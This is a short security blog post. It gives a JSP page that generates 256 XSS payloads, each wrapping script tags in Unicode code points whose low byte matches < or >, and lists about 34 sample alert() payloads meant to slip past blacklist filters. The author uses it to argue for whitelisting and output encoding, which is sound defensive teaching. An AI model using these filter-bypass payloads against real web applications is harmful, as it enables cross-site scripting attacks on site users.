I was looking at Matt Presson's Blog article about executing scripts with foreign char sets and decided to write my own JSP to generate every XSS that could be executed with foreign characters. This is a perfect example of why not to use blacklist. A simple whitelist or better proper output encoding (mentioned in my last post) will thwart these attempts.
<%@ page language="java" contentType="text/html; charset=UTF-8"
pageEncoding="UTF-8"%>
<%@page import="org.apache.commons.lang.StringEscapeUtils" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Insert title here</title>
</head>
<body>
<%
for(long i=0; i< 0x100; i++)
{
long lt = 0x3C;
long gt = 0x3E;
long order = i << 8;
long LT = order | lt;
//out.println(Long.toHexString(LT) + " : ");
long GT = order | gt;
//out.println(Long.toHexString(GT) + "<BR>");
String theScript = (char)LT + "script" + (char)GT + "alert(" + i + ");" +(char)LT + "/script" + (char)GT;
out.println( theScript + "<br>");
}%>
</body>
</html>
This will generate 256 different versions of javascript to bypass blacklist input validation attempts. Here are a few examples. They may not display properly on this blog so i recommend running it on your own tomcat server.
ļscriptľalert(1);ļ/scriptľ
ȼscriptȾalert(2);ȼ/scriptȾ
̼script̾alert(3);̼/script̾
мscriptоalert(4);м/scriptо
ԼscriptԾalert(5);Լ/scriptԾ
ؼscriptؾalert(6);ؼ/scriptؾ
ܼscriptܾalert(7);ܼ/scriptܾ
࠼script࠾alert(8);࠼/script࠾
़scriptाalert(9);़/scriptा
਼scriptਾalert(10);਼/scriptਾ
଼scriptାalert(11);଼/scriptା
఼scriptాalert(12);఼/scriptా
഼scriptാalert(13);഼/scriptാ
scriptalert(14);/script
༼script༾alert(15);༼/script༾
ြscriptှalert(16);ြ/scriptှ
ᄼscriptᄾalert(17);ᄼ/scriptᄾ
ሼscriptሾalert(18);ሼ/scriptሾ
ጼscriptጾalert(19);ጼ/scriptጾ
ᐼscriptᐾalert(20);ᐼ/scriptᐾ
ᔼscriptᔾalert(21);ᔼ/scriptᔾ
ᘼscriptᘾalert(22);ᘼ/scriptᘾ
scriptalert(23);/script
ᠼscriptᠾalert(24);ᠼ/scriptᠾ
scriptalert(25);/script
ᨼscriptᨾalert(26);ᨼ/scriptᨾ
ᬼscriptᬾalert(27);ᬼ/scriptᬾ
᰼script᰾alert(28);᰼/script᰾
ᴼscriptᴾalert(29);ᴼ/scriptᴾ
ḼscriptḾalert(30);Ḽ/scriptḾ
ἼscriptἾalert(31);Ἴ/scriptἾ
‼script‾alert(32);‼/script‾
ℼscriptℾalert(33);ℼ/scriptℾ
∼script∾alert(34);∼/script∾
Posts
No comments:
Post a Comment